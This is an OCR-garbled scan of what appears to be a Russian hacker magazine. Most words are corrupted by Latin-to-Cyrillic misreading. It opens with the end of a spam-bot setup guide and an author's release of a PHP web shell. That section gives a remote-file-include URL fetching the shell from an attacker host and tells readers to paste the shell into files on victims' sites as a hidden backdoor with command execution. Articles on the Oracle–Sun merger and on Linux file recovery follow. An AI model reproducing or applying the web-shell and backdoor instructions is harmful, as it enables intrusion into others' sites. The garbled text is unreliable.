2. Войти в админку (іпбех.рЬр) и выбрать пункт 
меню - ІЫЗТАББ; 

3. Настроить бота на получение заданий. 

На этом настройка бота будетзакончена, можно 
приступать ксоставлению спам-тасков]. 
Подробнее о макросах и прочем функционале 
админки бота читай на Античате: ЫТр^Логшп. 
апбсЬаЕгиДбгеасІ 104291 .Ыгтй. 

ПРОГРАММА: МА0ІСІМСШ0Е5НЕИ 
3.3.3 

ОС: *ЫІХ/ѴѴІЫ 

АВТОР: МАГ 

Не могу не порадовать читателей хи своим 
релизом веб-шелла :). Итак, Мадіс ІпсІисІеЗЬеІІ, 
каквидно из названия, предназначен для 
работы в инклудах. Рассмотрим ситуации, когда 
понадобится такой шелл: 

1. Имеем РЕІ, что-то вроде ЬйрТ/зТе.сот/іпсІех. 
рЬр?рабі=бйр://еѵі[.сопп/5Ье[І.ІхЕ 
Что делать, если не работает ваію тобе, либо 
использование консольных команд по какой- 
то при чинене дает нужного эффекта? Очень 
просто! Инклудь мой шелл и наслаждайся 
полноценным файловым менеджером на уда- 
ленной системе, который не будетзависеть от 
внутренних путей и адреса сайта. Тут стоит от- 
метить особенность скрипта: шелл откроется 



только по кейворду, который жестко прописан 
в его коде, то есть так: ЬирѴ/зКе.сот/іпбех. 
рЬр?раіЬ=Ьир://еѵі[.сот/5ЬеІЕіхі&кеу\л/огсІ 
(дальше кейворд спрячется в пост-запрос 
и его будет невидно; кейворд можно сразу 
послать в пост]. 

2 . Ты внутри сайта. Левые файлы заливать 
нельзя или палевно. Что делать? 

Просто скопируй весь код шелла в какой-либо 
существующий файл на удаленной системе и на- 
слаждайся скрытым бэкдором на сайте жертвы 
по адресу вроде: ЫТр://зі1:е.сопп/?кеѵѵѵогб . 

Из особенностей шелла: 

• независимость от путей/адресов сайта (то есть 
инклуд вроде ЬирѴ/зіІе.соппАкеѵѵѵогсІ&іюоІ = 
Ьагі 8Лоо2=Ьаг2 пройдет без потери парамет- 
ров Езоі и 1юо2 ); 

• шелл открывается только после передачи ему 
заранее определенного тобой кейворда; 

• Ьазіс-авторизация (на сдіЛазІсді автоматичес- 
ки отключается); 

• все данные передаются в $_Р05Т; 

• файловый менеджер с отображением подроб- 
ной информации о файлах; 

• отображение основной информации о системе; 

• рбр еѵаі/соттапб ехесиііоп; 

• загрузка множества файлов за раз на )з; 

• просмотр/редактирование/удаление файлов и 
директорий (удаление рекурсивно); 

• можно спокойно скачивать файлы очень боль- 
ших размеров (например, логи апача); 

• гір/ипгір файлов и директорий; 

• разбивка листинга файлов и директорий на 
страницы; 

• если шелл инклудится в существующий скрипт, 
тебе может пригодиться встроенная защита 

от взлома: отсекаются запросы по ключевым 
словам вроде еѵа I, Ьазе64, ипіоп ит.д. 

Все это великолепие весит всего 38,1 Кб. 

Теперь рассмотрим настройку шелла. Открывай 
скрипт и находи в его начале следующие 
строки: 

<?рЬр 

$ту_кеуѵ\г = ' кеумогЫ' ; //твой кейворд 
для доступа в шелл 
$ікетз_рег_раде =50; //количество 
файлов /директорий на одной странице 
шелла 

$а<±піп_пате= ' асітіп 1 ; //имя админа в 
Ьазіс- авторизации 
$асЗшіп_разз= 'разз^огсб' ; //пароль 
админа в Ьазіс -авторизации 

?> 

Все предложения и пожелания по скрипту 
направляй мне васю :1. ~г 
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■ ■ Мария «мірт;и» Нефедова міррішавЕАі-.ХАКЕР.ки 



Вершина 

пищевой 

цепи 

Огасіе, Зип и все, все, все 

ПРАКТИЧЕСКИ ВСЕ КОМПАНИИ-ГИГАНТЫ 
РЫНКА ІТ ДЕЛАЮТ ЭТО - ОНИ ПОКУПАЮТ 
ИНТЕРЕСНЫЕ ПРОЕКТЫ, «ПОРАБОЩАЮТ» 
ЭКС-КОНКУРЕНТОВ, ПРЕВРАЩАЯ ИХ В СВОИ 
ПОДРАЗДЕЛЕНИЯ, ПОДПИСЫВАЮТ ДОГОВОРЫ 
О СЛИЯНИЯХ И ТАК ДАЛЕЕ. ОДНАКО СИТУАЦИИ, 
В ХОДЕ КОТОРЫХ ОДИН ДИНОЗАВР РЫНКА 
ПОГЛОЩАЕТ ДРУГОГО, ВОЗНИКАЮТ НЕ ТАК 
ЧАСТО. РЕЧЬ, КОНЕЧНО. ИДЕТ О СДЕЛКЕ. В 
РЕЗУЛЬТАТЕ КОТОРОЙ КОМПАНИЯ 51Ш МІСРО- 
5Ѵ5ТЕМ5 ВОТ-ВОТ ОТОЙДЕТ В РУКИ КОМПАНИИ 
ОКАСІ.Е. ТАКОЙ ПРЕЦЕДЕНТ ОПРЕДЕЛЕННО 
ДОСТОИН ВНИМАНИЯ. 
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51ІМ МІСК05Ѵ5ТЕМЗ ШС. 

О компании 5ип мы уже писали неоднократно. 

В предыдущих номерахты можешь найти и под- 
робную историю 5ип и кучу самой разной инфы 
о ее продуктах (втом числе и о взломе оных], а 
также почитать биографии ключевыхлиц. 

Такое внимание кЭип с нашей стороны совсем 
неудивительно, всежеони были одними из пер- 
вопроходцев рынка и по совместительству много 
лет оставались одним из его флагманов. 
Впрочем, если ты не хочешь искать старые но- 
мера или не имеешьтакой возможности, краткую 
«историческую справку» я все же приведу: 

5ип Місгозузіеппз была основана в 1 982 году, и 
руки кеезарождению приложили известный 
венчурный инвестор ВинодХосла и програм- 
мисты Энди Бехтольшейм и Скотт Макнили. Чуть 
позже к этой троице присоединился еще один 
прогер — Билл Джой. 

Аббревиатура 5БЫ произошла отназвания 
ЭіапіюгсІ Бпіѵегзііу ІХеІѵѵогк («Сеть Стенфордско- 
гоУниверситета») — проекта, которым зани- 
мались Бехтольшейм и Макнили, какнетрудно 
догадаться, будучи выпускниками Стенфордско- 
го университета :]. 

На рынокчуваки пришли, имея большие 
планы и будучи полны идей. Все началосьеще 
с упомянутого университетского проекта, входе 
реализации которого им потребовались машины 
для САБ/САМ-приложений, и Бехтольшейм 
спроектировал для этих целей первую рабочую 
станцию 5ип — 5ип 1 . Станция такудалась, что 
наших героев посетила мысль, что из всего этого 
может получиться бизнес, ведь все то же самое 
можно делать и на продажу. 

Вто время мало кто помышлял о собственном, 



персональном компьютере — в большинстве своем 
люди работали на микрокомпьютерах по очереди, 
или же в режиме разделения времени. Втаких 
условиях предложить пользователям сравни- 
тельно недорогие и мощные рабочие станции с 
поддержкой сети (девайсы несли в себе Еібегпеі:- 
адаптер, поддерживающий ТСР/ІР, позволявший 
использовать распределенные вычисления) 
виделосьоченьнеплохой идеей. 

И хотя этот сегмент рынка уже отнюдь не был пуст 
— здесь присутствовали и Арріе и ІВМ, и НРи 
Ароііососвоими рабочими станциями, и многие 
другие, это основателей 5ип не остановило. 

В целях борьбы с конкуренцией они решили 
базироватьсвои станциитолько на промышлен- 
ных компонентах, а также бесплатном и открытом 
Бпіх, усовершенствованном лично Биллом Джо- 
ем (коий является одним из «отцов» ВЭБ БЫ IX. 

В общем-то, из-за Бпіх Джой и попал в команду 
5ип]. Каквыяснилось, они не прогадали. 
Практически с самого основания компании 
лозунгом, теглайном и бессменным девизом 5ип 
стала фраза «Сеть — это компьютер!». То есть, 
по мнению спецов 5ип Місгозузіетз: «Настоя- 
щим компьютером может считаться только сеть 
компьютеров». Поспорить с этим утверждением 
сложно, достаточно представить, чтоутебя нет 
интернета и проникнуться, мыслью какэто было 
бы ужасно :]. 

Однако вте годы все было далеко нетак просто. 
Прогресс еще только начинал свое шествие в 
массы, о сетях человечество только начинало 
предметно задумываться, и девиз потем време- 
нам казался фактически революционным. 

Но, какни странно, упомянутые массы не имели 
ничего против небольшой революции. «Сете- 



вая» политика молодой фирмы пришлась рынку 
очень кстати, уже на второй год существования 
компании она принесла 5ип контрактна 40 
миллионов долларов с Сотриіегѵізіоп — основ- 
ным поставщиком САБ-системтого времени. 
Контракт, кстати, был уведен прямо из-под носа 
главного конкурента — Ароііо. 

Немногим позже на свет появиласьтехнология 
ІЧеІѵѵогк Рііе Бузует (І\ІР5), которая еще больше 
укрепила фундамент будущего гиганта (и кото- 
рую, кстати, продолжают юзать по сей день). 
Мультиплатформенная І\ІР5(она работала под 
М5 Б05, ІВМ Б05, Мас’ом, ѴМ5 и никсами) 
позволяла юзерам получить доступ к ресурсам 
других, удаленных машин в сети. Самое инте- 
ресное — І\ІР5 была открытой, за лицензию на 
получение исходного кода 5ип просили совсем 
немного. Таким образом, в 5ип смогли нетолько 
заработатьна ІЧРЭсами, но и сделали техноло- 
гию общедоступной, а также смогли развивать ее 
нетолько своими силами, но и силами конкурен- 
тов и простых, сторонних разработчиков. Ход, 
конечно, рискованный, но, цитируя Билла Джоя: 
«Создать рынок — значит владеть им!». 

Похожие схемы компания впоследствии реали- 
зовывала неоднократно и практически всегда 
успешно. 

ОРАСІІСОРРОРАШ 

А теперь пришло время поговоритьоза- 
рождении Огасіе, которая еще старше 5ип 
Місгозузіеппз. 

Основали Огасіе в 1 977 году, и исходно фирма 
носила неприметное имя ЗоЛѵѵаге Беѵеіортепі: 
РаЬогаІогіез. На самом деле, перед тем как 
обрести знакомое нам имя, компанияуспела 
пережить целый ряд метаморфоз: так, в 1 979 
название изменилось на ПеІаІіопаІЭоЛѵѵаге Іпс, 
в 1 982 — на Огасіе Эузіетз (в честь флагманского 
продукта компании: Огасіе баіабазе] и, наконец, 
па ру лет спустя, миру явился великий и ужасный 
Огасіе Согрогаііоп. 

Основали будущего гиганта в области разработ- 
ки системуправления базами данныхтри чело- 
века — Эд Оутс, Боб Майнер и Ларри Эллисон. 
Пожалуй, можно сказать, что в судьбе Огасіе 
наиболее важную рольсыграл последний из 
перечисленнойтроицы — Ларри Эллисон, ведь 
именно его всегда называли мозгом компании. 
Поэтому о нем я расскажу подробнее. 

В детстве и юношестве Эллисона решительно 
ничто не предрекало, что он станет одним из 
богатейших людей на планете. Дело втом, 
что Ларри — сын 19-летней иммигрантки из 
Одессы, он родился в Бронксе, и в младенческом 
возрасте был оставлен матерью на попечение ее 
дяди и тети (которые впоследствии и стали его 
приемными родителями). 
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Он никогда не знал даже имени 
своего биологического отца, а до 
48 летне знал и своей настоящей 
матери. Его приемный отецугодил в 
тюрьму, когда Эллисону было всего 
18, а приемная мать умерла итого 
раньше. 

Вто же время Эллисону пришлось 
оставить второй курс университета 
(Спіѵегзііуоі ІШпоізаІ ЭгЬапа- 
СЬатраідп]. Причина была баналь- 
на — из-за всехсвалившихся на 
него перипетий Эллисон завалил 
экзамены. 

Ища лучшейжизни, свободный как 
ветер и еще совсем молодой Ларри 
решил податься в северную Кали- 
форнию кдругу, где и осел, попутно 
снова поступив в университет (на 
этот раз в университет Чикаго]. Там 
Ларризанялся программировани- 
ем, а также нашел работу, устроив- 
шисьв компанию Атрех. 

Забавно, но по какой-то прихоти 
вселенной Атрех Согр, основанная 
в конце Второй мировой, тоже дело 
рук русского иммигранта — пол- 
ковника царской армии, инженера 
и предпринимателя Александра 



Матвеевича Понятова. Название 
Атрех как раз происходит от его 
инициалов ититула: обращение 
«Ваше Превосходительство» по- 
английски — ехсеііепсе. АМРех = 
А.М.РопіаІоІІ ЕХсеІІепсе. 

Компания в целом и Понятов в 
частности известны, например, 
тем, что именно благодаря им были 
изобретены и увидели светтакие 
замечательные во всех отношениях 
девайсы, как катушечный аудио- 
магнитофон и видеомагнитофон. 
Многиелидеры рынка видеотехно- 
логий — Зопу, ЛѴС, ТозЫЬа, РЫШрз и 
т.д. — долгие годы работали именно 
по патентам Понятова. Словом, 
про Атрех и ее основателя можно 
рассказывать еще долго, нотаккак 
речьсейчас нео них, ограничусь 
л ишь тем, что замечу — Эллисон по- 
лучил должность в очень интерес- 
ном и перспективном месте. Один 
из проектов, над которым Ларри 
работал в Атрех Согрогаііоп, ока- 
зался связан с созданием БД для 
ребят из ЦРУ. По сути, для Эллисона 
это вылилось в написание первой 



вжизни серьезной программы и 
первой большой базы данных, и он 
справился. Получившемуся детищу 
Эллисон дал имя Огасіе. 

Отом, что было дальше, ты 
ужезнаешь — вдохновленный 
процессом программирования 
и рядом публикаций в прессе (в 
частности, статьей в ІВМ боигпаі 
оі Резеагсб апб Оеѵеіортепі о 
системахуправления реляцион- 
ными БД], Эллисон видит в этом 
хорошие перспективы для бизнеса 
и решает поставить написание 
софта на коммерческую основу, 
открыв собственную фирму. Его 
партнерами по бизнесу и соучре- 
дителями становятся коллеги по 
Атрех и проекту Огасіе — Роберт 
Майнер и Эд Оутс. Стоит отметить, 
что стартовый капитал Эллисон 
выложил из своего кармана, 
«инвестировав» в собственные 
начинания $1400. 

КТО КОГО «СЪЕЛ» 

Вернемся ктому, с чего началасьэта 
статья — к грядущему слиянию двух 
гигантов. 



Оказали ли 5ип и Огасіе влияние 
на рынок? Безусловно. Болеетого, 
они продолжают влиять на него и 
сейчас. Еврокомиссия недаром 
медлите решением уже более по- 
лугода, рассматривая их грядущую 
сделку со всех возможных сторон. 
Послезавершения слияния, в руках 
Огасіе окажутся все разработки 5ип 
в области «железа», фактическая 
монополия на технологию баѵа, 
плюс их собственные достижения 
на поприще систем управления 
базами данных. Но, какуже было 
сказано в начале — бизнес есть 
бизнес, и когда речь идето высшей 
лиге, здесь не обойтись и без 
длинной истории сделок по покупке 
перспективных стартапов, агони- 
зирующих конкурентов и такдалее. 
Кого же покупали Огасіе и Зип, кого 
поглощали, наращивая мощь и как 
стали тем, чем стали? 

зіш 

История Зип развивалась стреми- 
тельно. Рабочие станции прода- 
валисьхорошо, и когда компании 



понадобилисьбольшие мощности 
(в частности, Зип более неустраи- 
вали процессоры от Моіогоіа], было 
решено разработать собственный 
проц — возможности для этого име- 
лись. Такпоявился 32-разрядный 
микропроцессор ЗРАРС, созданный 
на базе переработанной РІЗС-ар- 
хитектуры. Он положил начало еще 
одной ветви бизнеса Зип — «желез- 
ной». И здесьЗип снова пошла по 
проверенному пут\л — архитектура 
ЗРАРС была открытой, приобрести 
лицензию на ее использование 
легко мог (и по сей день может] 
любойжелающий. Вто же время, 
в конце 80-х годов, Зип начала 
покупать другие компании, фирмы и 
фирмочки. Одним из первых приоб- 
ретений, например, стала Сепігат 
Зузіетз ѴѴезЕ, купленная в 1 987. 
Компания занималась разработкой 
сетевого софта для ПК, «Маков» и 
систем Зип. В том же году была при- 
обретена еще и Тгапсері Зузіетз, 
разрабатывавшая ускорители 
изображений и видео для рабочих 
станций. Но всеже, не рабочими 
станциями едиными... Наступили 



90-е, и Зип Місгозузіетз потихонь- 
ку принялась меняться. Если до 
этого ее основным продуктом были 
упомянутые воркстейшоны.то те- 
перь пришла пора уделить больше 
внимания софту для них и заняться 
дальнейшим развитием собствен- 
ных «железок». 

В 1991, выкупиву Еазітап 
Кобак фирму Іпіегасііѵе Зузіетз 
Согрогаііоп, Зип какое-то время 
выпускали девайсы с их Іпіегасііѵе 
ІЛ\ІІХ(портоперационной системы 
СІЧІХЗузІет Ѵна процессоры Іпіеі 
х86] на борту. К концу 90-х, когда у 
Зип появился свой Зоіагіз ОС, инте- 
рес к Іпіегасііѵе ІЛЧІХони утратили. 

В 1994 и 1996 годах Зип покупает 
сначала «железную», а потом 
и софтверную часть компании 
ТЬіпкіпд МасЫпез — разработчика 
высокопроизводительных машин. 
Интересно, что остатки компа- 
нии, которая еще какое-то время 
продолжала работать, занимаясь 
исключительно дата майнингом, в 
1999 году вы куп ит 0 га сіе. 

Втомже 1996 кЗип перешла и часть 



компании Сгау. История у этой сдел- 
ки забавная — известный произво- 
дитель серверов Ыдб-епб класса 
Сгау строил свои машины на честно 
купленныхуЗиптехнологиях, но 
любые предложения о слиянии с 
Зип отвергал. Однако, в итоге, Сгау 
поглотила великая и ужасная Зііісоп 
ОгарЫсз, и, нежелая работать с 
чужими платформами, принялась 
избавляться отлишнего балласта. 

В Зип были только рады «забрать»у 
5СІ ненужные ей подразделения. 
Благодаря этой сделке, «солнеч- 
н ые» дал и ста рт п роекту «51а ііі ге», 
из которого позже выросло 
пополнение в линейке ІЛЧІХ-серве- 
ров — многопроцессорный монстр 
Шга Епіегргізе 1 0000. Такими во 
времена бума доткомов, например, 
пользовался еВау. Цена полностью 
сконфигурированного девайса лег- 
ко достигала миллиона долларов. 
«Свежей крови» в серверные 
дела добавила покупка компании 
Іпіедгаіеб Місго Ргосіисіз, специа- 
лизировавшейся на отказоустойчи- 
вые серваках. 

Как можно понять, дела у Зип и 
так шли более чем неплохо, а бум 
доткомов, имевший место в конце 
90-х, начале 2000-х годов только 
«усугубил» положение. Прибыли, 
выручки, цены на акции, всеуве- 
ренно шло вверх. Нужно сказать, 
что кэтому моменту Зип подошел во 
всеоружии: в 1995они явили миру 
платформу баѵа и все с ней сопря- 
женное; успешно внедрили плат- 
форму Ореп Ыеіѵѵогк Сотриііпд; 
перешли на собственную ОС Зоіагіз, 
сформировав подразделение 
ЗипЗоІІ, занимавшееся развитием 
ОС и сопутствующего ПО; предла- 
гали широкий спектр серверов и 
рабочих станций всех мастей. 

Ну, а когда все складывается как 
нельзя лучше, «время покупать»! 
Одним изудачнейших приобрете- 
ний Зип в конце 90-х стала немец- 
кая фирма ЗіагОіѵізіоп, разрабаты- 
вавшая офисный пакетЗіагОІІісе. 
Все лицензированные части из 
пакета были удалены, после чего 
оставшуюся частьдокументации и 
кода полностью открыли. На базе 
этих исходников, например, возник 
проектОрепОІІісе.огд, который 
Зиптакже необошла вниманием 
и поддержала. Плюс, конечно, 
корпоративным клиентам ЗіагОІІісе 
продолжал и продолжает постав- 
ляться, являясьпроприетарным ПО. 
Вот некоторые другие сделки конца 
90-х, начала 2000-х: 1997 — СЬогиз 
Зузіетз, создатели СбогизОЗ. 

1 998 — і-РІапеІ, небольшая софт- 
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верная компания, написавшая 
е-таіІклиент«РопуЕ5рге550»для 
мобильников. 1998 — ЫеЮупатісз, 
создатели ІМеЮупатісзАррІісайоп 
5егл/ег. 2000 — СоЬаІІ ІЧеІѵѵогкз, про- 
изводительустройств для доступа в 
интернет. 2001 — Б5С Іпс., разработ- 
чики ЗіогадеапсІАгсЫѵеМападеппепІ 
Рііе Бузует и Оиіск Рііе Бузует. 

Однако все рано или поздно конча- 
ется, и «белая полоса» в истории Зип 
оборвалась, когда лопнул пузырь 
доткомов. Резкое падение выручек 
и падение цен на акции повлекло за 
собой многочисленныеувольнения, 
сокращение производства и смену 
руководства компании. Перечис- 
ленное, конечно, тоже неулучшило 
общей ситуации. В это же время 
многие крупные компании стали 
отдавать предпочтение не дорогосто- 
ящим серверам 5ип, а более простым 
решениям, вроде серверов х86-архи- 
тектуры ПК-класса, работающих под 
Линуксом. Конечно, ихтребовалось 
больше, но все равно выходило куда 
дешевле. Впоследствии Зип удалось 
немного исправить эту ситуацию — 
помогли новые процессоры, в част- 
ности ШгаЗРАРСТІ, но возвраще- 
ния кпрежним временам все равно 
ждать уже не приходилось. В период 
медленного угасания, длившийся 
с начала 2000-х годов и до наших 
дней, Зип Місгозузіетз, конечно, 
успела заключить еще множество 
сдел о к и « съел а » десятки ко м п а н и й , 
ноупоминания достойна, пожалуй, 
лишьодна из них: в начале 2008 года 
агонизирующий, но нежелающий 
сдаваться Зип приобрел МуЗОБ 
АВ — разработчиков и обладателей 
прав на ореп-зоигсе СУБД МуЗОБ. 
Покупка обошласьЗип почти в мил- 
лиарддолларов и сулила хорошие 
перспективы, делая «солнечных» 
одними из крупнейших игроков на 
рынке орепзогсе. Но в конце 2008 
появились первые слухи отом, что 
сама Зип скоро будет продана. Вско- 
ре эти слухи подтвердились. 

ОРАНЕ 

Огасіе фактически стала одной 
из первых в истории компаний, 
которая начала продавать СУБД 



отдельно от «железа» — обычно эту 
роль на себя брали сами вендоры. 

В результате, продукты Огасіе, 
быстро научившиеся работать с 
самыми разными платформами и 
комплектующими, произвели на 
рынке настоящий фурор. Самым из- 
вестным продуктом компании была 
и остается непосредственно СУБД 
Огасіе, с годами претерпевавшая 
различные метаморфозы. 

Так, Огасіе ѵ2 (пусть цифра 2тебя не 
смущает, это была первая версия 
«Оракула»), вышедшая в 1979, 
была написана на ассемблере и 
стала первой коммерческой СУРБД 
на языке ЗОБ — весь основной 
функционал ЗОБона реализовы- 
вала. Сто ит отдельно отметить, что 
Эллисон и сотоварищи «подсмот- 
рели» всеэтоу ІВМ, которая как 
раз работала надЗШ и БД, но не 
видела в этом особых коммер- 
ческих перспектив и не боялась 
писать об этом статьи :]. В итоге, 
Огасіе опередили ІВМ с выпуском 
ихСУБДЗузІет В, показав, что 
коммерческие перспективы у БД 
просто прекрасные — недостатка в 
покупателях не наблюдалось. 

Огасіе ѵЗ, в свою очередь, уже была 
написана, точнее, переписана на 
Си. Она научилась поддерживать 
транзакции и стала первой СУРБД, 
работающей на мейнфреймах, 
мини-компьютерах и ПК. Огасіе 
вообще часто оказывался первым. 
Дальнейшие версии продолжили 
обрастать полезностями и необхо- 
димостями, и если в 1980 году штат 
компании насчитывал всего 7 чело- 
век, а годовой доход не превышал 
миллиона долларов, то уже в 1986 
году Огасіе благополучно вышел на 
биржу, став публичной компанией с 
доходом в 55 миллионов. 

Вплоть до 90-х годов дела у Огасіе 
шли хорошо и ровно, без каких-ли- 
бо эксцессов, и возможно именно 
поэтому сотрудники излишне 
расслабились и упустили перелом- 
ный момент. Огасіе уже успел стать 
одним из лидеров на рынке ПО, но 
не заметил прихода сильных конку- 
рентов и «пропустил удар». 
Главными «врагами» стали ком- 



пании ЗуЬазе и Іпіогтіх, битва с 
которыми длилась несколько лет. 
Огасіе тогда оказался на грани 
банкротства — продажи упали на 
80%, расходы превышали доходы, 
и это понесло за собой сокраще- 
ния. Казалось, что еще немного и 
компания зачахнетсовсем. Тогда 
Эллисон принял решение, обновить 
состав практически всего руководя- 
щего звена, и это, о чудо, помогло. 
Выпуск новых БД, внимательность 
и аккуратность по отношению к 
маркетинговой политике — все это 
сумело спасти компанию. 

На руку 0 га сіе сыграл и тот фа кт, что 
ЗуЬазе в 1 993 осуществил слияние 
с компанией РоѵѵегзоЛ, а права 
на свой софт под ѴѴіпсІоѵѵз продал 
Місгозоіі. Кстати, теперь их продукт 
известен под именем ЗОБЗегѵег:), 
Конец конкуренции с Іпіогтіх и 
вовсе положил случай. В 1 997 
противостояние между компаниями 
не сходило с первых полос СМИ, и 
Іпіогтіх как раз готовила очередной 
«ответный удар», когда ее директор 
Фил Уайт неожиданно попал втюрь- 
му. Потеряв своего лидера, Іпіогтіх 
постепенно сдала позиции, а в 2000 
и вовсе была поглощена компанией 
ІВМ. Получив перерыв в парулет, 
Огасіе успела полностью встать на 
ноги, вернутьсебе прежнюю мощь 
и подготовиться к выходу на рынок 
новых крупных конкурентов, в 
частности, Місгозоіі: ЗОБЗегѵег. До 
начала 2000-х годов Огасіе, как ни 
странно, не стремился перекупать 
все, что плохо лежит. Зато с 2005 
года, начавшегося с приобретения 
компании РеорІеЗоЛ, в руки Огасіе 
отошли десятки фирм (более 50, 
точную цифру назвать сложно). В 
основном Огасіе приобретал сред- 
них размеров компании, так или 
иначесвязанныес производством 
БД — все, что могло пригодиться, 
покупалось, но втоже время Огасіе 
не распылялся. 

Самой крупной сделкой в «пос- 
лужном списке» Огасіе на сегодня 
является, конечно, завершающееся 
поглощение Зип, аналогов которому 
по масштабности и цене в истории 
Огасіе пока не было. 



ЗАКЛЮЧЕНИЕ 

Когда в 2008 были обнародованы 
печальные цифры статистики, 
согласно которым убытки Зип 
Місгозузіетз исчислялисьсотнями 
миллионов долларов, а количество 
уволенных сотрудников уже 
измерялосьвтысячах, начались 
разговоры о скорой продаже компа- 
нии. Их подтвердили сообщения в 
прессе, появившиеся в начале2009 
года — слухи гласили, что компания 
ІВМ сделала Зип предложение, 
ценой 6.5 млрд, долларов. Однако, 
информация не подтвердилась, 
илиже, согласно«проверенным 
источникам», Зип и ІВМ не сумели 
достигнуть консенсуса. Второе 
известиеуже оказалось правди- 
вее: вапреле20095ип и Огасіе 
официально объявили о своей 
сделке. Пресс-релизы гласили, что 
Огасіе предложил $9.50 за акцию, то 
есть, в сумме раскошелился на $5.6 
миллиарда, а с учетом долгов Зип — 
на $7.4 миллиарда. Уже 16-го июля 
стало известно, что акционеры Зип 
дали «добро» на совершение сдел- 
ки, но государственные инстанции 
такторопиться не собирались. 
Быстрее всех закончило свои 
проверки правительство США — оно 
одо б р и л о с дел ку е ще в а в густе . А 
вот Еврокомиссия должна была вы- 
нести решение этой осенью, однако 
отодвинула срок на первый квартал 
201 0 года. Пристальный интерес 
европейцев вызываеттотфакт, что 
Зип владеет МуЗОБ. Российская фе- 
деральная антимонопольная служба 
тоже неторопится с вынесением 
вердикта. Повторюсь: колебания 
антимонополыщиков можно понять. 
Вместе Зип и Огасіе составляют «иде- 
альную пару». В одном месте сойдут- 
ся практически полная монополия на 
Заѵа, серьезные Ьагсіѵѵаге-мощности, 
мощнейшая БД.укомплеітованная 
опциями на все случаи жизни, Ѵігіиаі 
Ьох, Зоіагіз ОС, МуЗОБи многое, 
многое другое. Как распорядится 
всем этим Огасіе, отчего откажется, 
что продолжит развивать, а что адап- 
тирует под себя, известно, пожалуй, 
только Ларри Эллисону. Но каждому 
ясно, что перспективы огромны, т 
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ВОССТАНАВЛИВАЕМ ДАННЫЕ С РАТ, ИТРЗ 
И УР$, НЕ ПОКИДАЯ ШІІХ 



О ВОССТАНОВЛЕНИИ ДАННЫХ С ФАЙЛОВЫХ СИСТЕМ НИОХ НЕ ПИСАЛ ТОЛЬКО 
ЛЕНИВЫЙ. ДЛЯ ВЫПОЛНЕНИЯ ЭТОЙ ЗАДАЧИ СУЩЕСТВУЕТ МНОЖЕСТВО САМЫХ 
РАЗНООБРАЗНЫХ СРЕДСТВ, ВКЛЮЧАЯ УТИЛИТУ БЕВ1ШР8, КОТОРАЯ С ЛЕГКОСТЬЮ 
ИЗВЛЕКАЕТ ЛЮБЫЕ ПОТЕРТЫЕ ФАЙЛЫ С ЕХТ2. НО КАК ЖЕ БЫТЬ С ДРУГИМИ ФС? КАК 
ВОССТАНОВИТЬ ИСЧЕЗНУВШИЙ ФАЙЛ С ФЛЕШ-БРЕЛКА ИЛИ РАСПОЛОЖЕННОГО РЯДОМ 
МТР5- РАЗДЕЛА? ОБ ЭТОМ МОЛЧАТ ДАЖЕ САМЫЕ ТРУДОЛЮБИВЫЕ БЛОГГЕРЫ. А МЕЖДУ 
ТЕМ, ВСЕ ОЧЕНЬ ПРОСТО И ПРОЗАИЧНО. 



е всегда удобно перезагружаться в 
другую операционную систему для 
выполнения действий по проверке 
файловых систем, восстановления 
файлов, изменения размера разделов 
и выполнения других операций сданными. 
Представь, что уже несколько лет на твоем 
компе установлено две операционные системы: 
ѴѴіпсІоѵѵзи Ыпих. Первую ты загружаешь очень 
редко и только в экстренных случаях, второй 
пользуешься ежедневно и уже подумываешь о 
полном переходе на Ыпих иудалении винды, 
воттолько І\ІТР5-раздел, хранящий годами на- 
капливаемые данные, перевести в ехіЗ нельзя 
никакими инструментами. Приходится держать 
две операционки, потому что хоть І\ІТР5-раздел 
и доступен из Ыпих (с помощью пѣТз-Зд) , для 
решения проблем файловой системы все равно 
придется перезагружаться в ѴѴіпсІоѵѵз. 

Аесли накрылась файловая система РАТ на 
Ріазб-накопителе? Опять перезагружаться 
в ѴѴіпсІоѵѵз? Илиты случайноудалил файл в 
файловой системе 1)Р5, принадлежащей рядом 
установленной РгееВЗО? Может быть, ты сис- 
темный администратор, и диска для восстанов- 
ления ѴѴіпсІоѵѵз в нужный момент не оказалось 
под рукой? Отвечу на все вопросы сразу: почти 
вседействия по возвращению из небытия фай- 
ловых систем РАТ, ІЧТР5, ЮР5, восстановлению 
хранящихся в них файлов, диагностике и много- 



му другому можно произвести, не покидая Ыпих. 
Из этой статьи ты узнаешь, как это сделать. 

НАБОР ИНСТРУМЕНТОВ 

Перед тем, как перейти непосредственно к 
описанию процесса восстановления, диагнос- 
тики и возвращенияубитых файлов кжизни, 
считаю своим долгом ознакомить тебя со спис- 
ком используемых инструментов. Во-первых, 
нам понадобятся инструменты для работы с 
файловыми системами (создание, проверка, 
получение информации]. Всеони распростра- 
няются в трех пакетах: 

1. сіозізіооіз — утилиты для работы с файло- 
выми системами типа РАТ. Пакет содержит 
всего две программы: т кі'з.ѵбаі; (ткіз.сіоз] для 
создания файловой системы и бзск.ѵбаі: (Ізск. 
бое] для выполнения проверки файловой 
системы. 

2. иІзиШз — набор утилит для работы с ИРВ и 
производными (например, РР5, используемой 
во РгееВСО. Содержит восемь утилит, вклю- 
чая ткіз.иіз, бзск. ибз, Іипеіз.иіз (настройка 
ФС], дгоѵѵіз.иіз (изменение размера] и другие. 

3. пНзргодз — различные утилиты для работы 
с ІЧТР5. Не содержит программ для созда- 
ния или полной проверки (базовая проверка 
возможна] файловой системы, но включает в 
себя массу полезнейших инструментов, таких 
как піТзср для копирования файлов без мон- 



тирования раздела, «реинкарнатор» файлов 
піТзипсІеІеІю, утилита для изменения размера 
раздела пізгезіге, программа для клонирова- 
ния разделов піТзсІопе и другие. 

Также нам могут пригодиться инструменты для 
работы с разделами жесткого диска. Есть три 
наиболее продвинутые программы такого типа: 
рагіеб ( ѵѵѵѵѵѵ.дпи.огд/зоіѵѵаге/рагіесі ]. предна- 
значенная для создания разделов, изменения 
их размера, перемещения, создания и проверки 
файловых систем; драгі ( ѵѵѵѵѵѵ.ЬггіІѵѵа.сІе/тЬ/ 
драг! ] — программа-восстановитель затертой 
таблицы разделов и ТезЮізк ( ѵѵѵѵѵѵ.сдзесигТѵ. 
огд/ѵѵікі/ТезіРізк ] — аналог драгіе псевдо- 
графическим интерфейсом и несколькими 
полезными функциями. 

Следует отметить, что рагіеб — лишьхорошая оберт- 
ка поверх описанныхутил ит для работы с файловыми 
системами, поэтому почти все, что может раііесі, 
могуги они. Причем вокруг самой раііесі естьи другая 
обертка, названная драііеб ( араііесі.зоигсеіоте.пеі: ]. 
Она всего-навсего создаетудобный графический 
